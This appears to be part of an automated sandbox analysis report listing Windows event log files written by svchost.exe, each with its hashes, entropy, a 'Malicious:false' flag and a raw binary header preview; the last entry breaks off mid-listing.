                                                                                                                                SHA-512:C2F5AF43559DCE7BB66ABE305DF2DCFF0C95E2CF431D8DD0B6A02E216C8F4329C3B888BF2BF378918851A3066976FCEE745593B60970E5B9843535E6301E5BA0
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........................................8!..$.0v....................................................................>...........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):3.7640902535465997
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:/XhZUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:/XvnS
                                                                                                                                MD5:D9B1E760925AFD6E03034D3295E2691F
                                                                                                                                SHA1:555CB7D82251B7D07B43B1D874429C60898E0A86
                                                                                                                                SHA-256:3E42AC1F97B1887FE0223484E46A973FC7BCB32EC349F09D4E0A3CC1EDE1D60C
                                                                                                                                SHA-512:D51557DBC9ADCC7651B950551020A671CF75C7080C3E773194F93F4D775F9015A16C06D5BB8135564B5DC59D7A7BDB08BED2DBEAF939FC7FDB867BF991C35A8D
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........'...............'............I...J.....s....................................................................?...................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................................................>..............O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):2.4373812410985773
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:50VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9OaafcmafEMXW0OWkjWr:jcEt
                                                                                                                                MD5:5166C2E32BD35C5E8D122799E53B4EA3
                                                                                                                                SHA1:628619C0E31F8C29ED260FCC063CD27935ACC25C
                                                                                                                                SHA-256:433A96E20784F1E6FB099FA4AB020EEA75BB22EEBC7D969497A31ABCB9B415AB
                                                                                                                                SHA-512:E5EA93AA871264E180BBC67008D7AA1012CDCAC74D22D10B47F1849380E092DF2FD798C7143DD3CAB5D9192EB4A89BB0EE60DA662E626923551906AB8F31DFD9
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........?...............?............y...{...v.......................................................................bV................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&.......>h..................................................%_..........................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):79576
                                                                                                                                Entropy (8bit):4.127796335209658
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:rhNiGQ5XpvVRYBQf5pJiT5pwiT5yY4iT5pBiT5pJk5pbik5pKik5yY5Lbik5p9i8:rSLpBVi7CPqmxVjLv
                                                                                                                                MD5:11A70480184485AFBA8B7791B05128D7
                                                                                                                                SHA1:EF7BE97EC9B3E8DEF83B96557E1883761D3749A5
                                                                                                                                SHA-256:10A078034B838E5738AB776F636D5221947679B8811691D10E046BC6E5B19E82
                                                                                                                                SHA-512:02B0BFB4E785056026C025FE0E4482F93714C53286ED3CD82DD74E229FD3C5F3AD1AA0E828614E670E28D968C096D7A1A6ABA6868EC8CDF759CA603302836DF7
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.'.......+.......'.......+............$..`+..gv,......................................................................O..................X...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................1...............................................................&.......................................**......'...........f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.322146858454247
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:NH6/hDGCyCkCzCRCFC5CdCbCHCQCrlC+C2CV2CfCrUCECZ/C/C/2a22j2EW2z2/5:NH6/d7kNrTgt
                                                                                                                                MD5:D8DABE7AC7FE8F2D1CD853002971BB8A
                                                                                                                                SHA1:AC6B0F9940C1B3DB1FBC58DE8A95DD252FA73A6A
                                                                                                                                SHA-256:DDC0E74C04DFDB71841128067C33E0B5388CC5E93EEA1FDA4ADDFC6CA39FCC77
                                                                                                                                SHA-512:A9AF55922FC793B10A17731BC7F83A70E741E695B47249993530612A11D0A41481068A4DFD4B07182F5604A4AE289211D00766B79DB67CC25171D4ECA5A9292A
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.U...............U...................`...h....fyC......................................................................K................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................F..............................&...............................................nw..............iq......................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.475265357832672
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:P1W7C3yZy0PwbjNIFTLyQV2qRR4jBGDL+2ubu1ho7t8ckcXWIkFElThsk687vzGe:P1W7C3yZy0PwbjNIFTLyQV2qRR4jBGD+
                                                                                                                                MD5:605D94FA0C65C59EECEECC2BEB2F61B5
                                                                                                                                SHA1:28CA14F5E02A0A0348C4AC4A22BC228390B64F94
                                                                                                                                SHA-256:4667182188A73611A09A2F2B7A5E623367634933BE49899E07ED2FFB99142381
                                                                                                                                SHA-512:10CC31A6B3F5CC0AF090861E7EC615289DE4AB43E7B612F4F6518D6FEF8CD943E6A0F8A165AB4F6CAD5509575CC0C0D46960940799C95F1C6D6F103B4594EEA6
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.....................................0k...l..C.......................................................................2\x5................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................6Y......................................**..............X.j[d.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):93952
                                                                                                                                Entropy (8bit):4.456593840339493
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:SpBNHyfCVmRyzFyQWsk4cLSKph9YC/cmqbL9tKGjDLSGUpBpJyGBqpBNHyfCVmom:SLNHMCVmRyzFyNsk4cLSKph9YC/cmqbs
                                                                                                                                MD5:CDE0D8172C63CA2C5350495BD6A7417A
                                                                                                                                SHA1:1E82A9FCC129B2489154260B732C277B4212F495
                                                                                                                                SHA-256:4B4CDA6686D8896C60558ABD34473192D43667CF2C61DD33D443EE22E34043C5
                                                                                                                                SHA-512:8C74D0F34EEBFAC972B630348EBCF42D87BB9921CB0D657C2D4567F5A473B7FC3AD7590834909C1150CAE68C47D762F6AF457F07DCB11D44BFCEA2BDCFABF5C6
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.+.......X.......+.......X............X..hZ...Z%(.......................................................................'................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F................................................................................................O.......8..&.......AR...6..12...............:......**..x...R.......]...PN.........Z..&...............................................................8.......P.....!....nqm......... ]...PN..............K...........R........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e..n30'.|D..Q.R.a.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......L12........r.i.tx...**..(...S...........PN.........Z..&...............................................................8.......P.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.517082344367377
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:YjdAhA71d7587RS7a07DL7T7G7z7L7k7OXD7u7y7I717/7u7m727L07E7K72t7Rt:YBAiHEV6koTxbkeQEWi7Di
                                                                                                                                MD5:2628D3458E9FBE638FC3A49E317866FA
                                                                                                                                SHA1:8DB033ED373F8A837073679CE0F3B5DC1BD7085B
                                                                                                                                SHA-256:D2B987B5AC61D1C66CACD6D0492AC4C4C316C9EE94638A0D312803BB9C24FD00
                                                                                                                                SHA-512:6C3683E0A8CF261353830E1F2344A59428E55BBCAFE032AF52624FF961F28608C7E64134BBA4764DEB8885D384DFA593325DB889E9D752226FC29885E3520A67
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.....................................po..@q....`....................................................................\.$.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................e4.............../..s...........&................................................L..............e2......................**..H............<R.d.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):2.314954486903959
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:5mhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauia:s6Ovc0S5UyEeDgLpIC4DoA4
                                                                                                                                MD5:864CAA67E4BF2A335E088526FF347CD9
                                                                                                                                SHA1:64E224001D864A18D4999F5D33A42C532877A361
                                                                                                                                SHA-256:C904C319101B31E991343FC8FF2929F6841599C9DCC23AC6218272F630AD5894
                                                                                                                                SHA-512:B899FA6CDC7D0F97BACCC9025516045878BBA58E86ADEA79AA164B3B27F00F6E52F8B8838210A3ECD0C0E6A20D9DD48A4A4754F7408C1DA5F1FDC2EE7A504231
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........A...............A............u...v..........................................................................c.w.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................6f......w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):2.773262505715791
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:bhGuZumutu4uEu5uOuDuyb2uPu1uVupUupu+R7udu4uEu1u0u8uhuluxuMuxuMuH:b/vI
                                                                                                                                MD5:C06B3BF303EBDD17D76D87B596EE5407
                                                                                                                                SHA1:BFC46338E3A89112D6D7E1CFF7A9FB5909DE6458
                                                                                                                                SHA-256:26AB9FE5730119306B700304DF2B2C11C6E8322F29CAA9AD49CBBA968DD54CD9
                                                                                                                                SHA-512:7CBD5FFB770669AC0295C6221E02D24C116F4B72E3D990F60D122B2AED3280075DA5C3DBCA8A5749F5E566920799087D1094ECB31B5937D8B78EFB40BEC0D0A2
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........T...............T...........@........J......................................................................?..................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................vN......................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.2371167268838485
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:RhiAeCv4A+yMrAmA1AHA6AbAMAEAFmANA49ALAEAyKiAfAFgAw+AqAFAApjANAil:RCCvudb6KinaWRQJ4+8nEPDh0
                                                                                                                                MD5:3F2115642206C3D448781C58F4EE8AF3
                                                                                                                                SHA1:1408F4FF05D6887F74B445E296BC9B69163EDDAE
                                                                                                                                SHA-256:84EF0FE4C7A64FA8200DEE7E064A658C2BB94A262A6DBD1353CB7EE458DF1684
                                                                                                                                SHA-512:C3B530EA9AC3FD03615D91457CB88474254CCC6B53B3737C932690059274ED18552F40836F7CF78B698A650D636A93B72EC8C8E8057921A28CAF3718D18C85CC
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........................................@....a..........................................................................................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................5.................................................... ..........&................................$......**..`..............;f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):3.1631981097466806
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:4hKpsdp90mp9b2p9iGp95ep94+p9/Kp9Wqp9tap98Cp9Pp96p9lp9za1p9Dp9Wpb:4cafg0Y
                                                                                                                                MD5:CBAE5379AAAD2B6A84714F5CEA39ACFA
                                                                                                                                SHA1:A1AC7C71917C9F27EDA9E17CF0CAD78FC07A82E5
                                                                                                                                SHA-256:726B1343CDE4D4B7D2558B9B3E86DAD3782983304D0349974FFA7725D40A9D2B
                                                                                                                                SHA-512:7A6DF8A6BDF99348719F7005EFD293089BDD9EB93E2801CB7F3F38C77717E1E47D496E7A1D8FA9FED8EC27D28946214B71C7B156A537B40112D4A76E38F968B8
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........'...............'....................k......................................................................+N.>........................................<...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..............E.yrf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.036288214996343
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:vhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWB0:vwDoh1V00eB9iVsTBwMjO2
                                                                                                                                MD5:80B64057A5C06D0016A06F2D493CF301
                                                                                                                                SHA1:452FDD974A9D63E05AC2F9AE4199CFD0C7CDCD62
                                                                                                                                SHA-256:5ABDEF24E5D651A400B36F57A109443BC4F1C975FDAEBB512ADE44935C8BEB1A
                                                                                                                                SHA-512:4F9E119EDA7FEED0948DABBDE51C9CBD835DB19EE717F3ED6EB99A16240EB351C968F4A8C39E8BCA2124A0E8A1C53AE5CD8A7D7F61748AFDE0574FF675166F43
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.\...............\.......................X...j.......................................................................LU.t................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i..................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):1.166433348209963
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:/hwCCRzCaCkClCzCYC/CyCVCGCMCvCACWCKECQCMCdC:/KF6
                                                                                                                                MD5:9AB3073B8BEBBC3C1E9DCB47217C8E27
                                                                                                                                SHA1:33477618A675262EFDC74FACE70AE448EE9CAA05
                                                                                                                                SHA-256:E19A280A63CB747D2029892A6F0E67D2C83461FF15112067AF24B8B5E136CC30
                                                                                                                                SHA-512:58DD3DECA39CBF605861F78EDD27F3F97858581322063E9F7F1169C9F190613A22649289959A525729F503643B5EFDF5C1C20EE43C21B69C9B4468BA0BDAD6F5
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.....................................04..h6............................................................................4................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................+................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):144392
                                                                                                                                Entropy (8bit):4.680075877816149
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:AN0bGAyKAyUzAyBN0bGAyKAyUzAyj+nwDy8KhAy56N0bGAyKAyUzAyobYe:dQv0/Qv0UkdWQQv0z
                                                                                                                                MD5:9414F80A31868EBCD160247848B16DBD
                                                                                                                                SHA1:63E3DBA3D6A79AF32B0B9FC0B0992585300BAB51
                                                                                                                                SHA-256:8D45D52B541F3D16EDB58AB0E4F998ABFA1F752577A415C9927288DA40382C97
                                                                                                                                SHA-512:0026254DA0B0C97E6FBE862E48A0DB9FCC13AD2F99370AD194E710AF7B3DA5C400FA6E0331D242AB807EC643E72C0E72439CEDC4E7C7E17F4B9D01658A21654C
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk..%......,&.......%......,&.......... ...X...i.......................................................................P...........................................6...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................M...........&.......................................**.......%.......V..PN.........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):79016
                                                                                                                                Entropy (8bit):1.8211201575481277
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:yBhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUm6UmaUmVAUmQUmehL6UsE0Zu:WY7L8yY7L8
                                                                                                                                MD5:B0AAD4CF0D79F0E382014AAB35688B47
                                                                                                                                SHA1:4BD8A9DF7EFAE235AA9CF3A9A8A0DD7CF5A82EC8
                                                                                                                                SHA-256:EF0385E24249F469133B4AFADF6F95EA7C12AD059700E95174877D1986ECDD3A
                                                                                                                                SHA-512:7AA3692D0DA4E6FA10906A6ABDFC2573BD7155936257830C0B62C0FB509A0091BB402D3116AD61ED2047E13D97E3B79F1A8273B98EC99A842807CC4E56BE7A2A
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfFile.....................................................................................................................\>.eElfChnk......................................1..(4..i.!......................................................................................... .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................>-......................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):67776
                                                                                                                                Entropy (8bit):0.36810741683259496
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:MauVWd8prP+8QNRBEZWTENO4brBE3ovPa/6yYuVWd8prP+8QNRBEZWTENO4brBEn:a8NVaO8iovC/6yP8NVaO8iovC/6y
                                                                                                                                MD5:F68A2754C4C1DD7BE6F25C5463F96DB1
                                                                                                                                SHA1:AEF943F956DF3029B721F9315A382975BE0F7DA5
                                                                                                                                SHA-256:D96FCE9B7296AFA226B1C36C53034F26749DA0306CEF65C2093578A0E6C5CCA4
                                                                                                                                SHA-512:ACD06B067B96BC5526469CCC3FBE94D660A382A62064B988E5CA5C9594F05A2A550D1B976D6128131DE2D8811D93CE319A6C43D65EB760DA6390EC869E003448
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk..............................................h~.....................................................................G..c................".......................J...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**.................g..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):1.9658503180918458
                                                                                                                                Encrypted:false
